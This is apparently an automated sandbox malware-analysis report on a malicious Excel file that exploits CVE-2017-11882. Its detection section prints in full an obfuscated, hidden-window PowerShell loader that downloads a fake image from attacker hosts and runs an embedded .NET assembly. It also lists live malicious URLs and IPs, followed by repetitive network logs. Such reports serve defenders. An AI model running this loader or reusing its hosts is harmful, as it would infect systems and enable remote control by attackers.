gTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTre
Sigma detected: Office Macro File Creation
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2596, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3476, TargetFilename: C:\Users\user\AppData\Local\Temp\nd1hg0ny.nwn.ps1

Data Obfuscation

barindex
Sigma detected: Powershell download and load assembly
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\S

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://91.92.244.96/agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doCAvira URL Cloud: Label: malware
Source: http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpgAvira URL Cloud: Label: malware
Source: http://91.92.244.96/agh/mcirosfotupdatedAvira URL Cloud: Label: malware
Source: http://91.92.244.96/agh/Avira URL Cloud: Label: malware
Source: http://91.92.244.96/3566/loverhappy.vbsAvira URL Cloud: Label: malware
Source: http://91.92.244.96/3566/loverhappy.vbsooC:Avira URL Cloud: Label: malware
Source: http://91.92.244.96/agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfaAvira URL Cloud: Label: malware
Source: http://91.92.244.96/3566/loverhappy.vbsjAvira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\310E1AAE.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{67551F0E-90CB-489F-80A1-F0E70E1E7186}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Multi AV Scanner detection for domain / URL
Source: http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpgVirustotal: Detection: 14%Perma Link
Multi AV Scanner detection for submitted file
Source: SHREE GANESH BOOK SERVICES-347274.xlsVirustotal: Detection: 24%Perma Link
Source: SHREE GANESH BOOK SERVICES-347274.xlsReversingLabs: Detection: 18%

Exploits

barindex
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 91.92.244.96 Port: 80Jump to behavior
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknownHTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.433742680.0000000004D93000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Shellcode detected
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_036B053F ShellExecuteW,ExitProcess,9_2_036B053F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_036B0511 URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_036B0511
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_036B0496 LoadLibraryW,ShellExecuteW,ExitProcess,9_2_036B0496
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_036B052A ShellExecuteW,ExitProcess,9_2_036B052A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_036B03E1 ExitProcess,9_2_036B03E1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_036B0564 ExitProcess,9_2_036B0564
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_036B0416 LoadLibraryW,9_2_036B0416
Suspicious execution chain found
Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: global trafficDNS query: name: paste.ee
Source: global trafficDNS query: name: paste.ee
Source: global trafficDNS query: name: uploaddeimagens.com.br
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.84.67:80
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.84.67:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
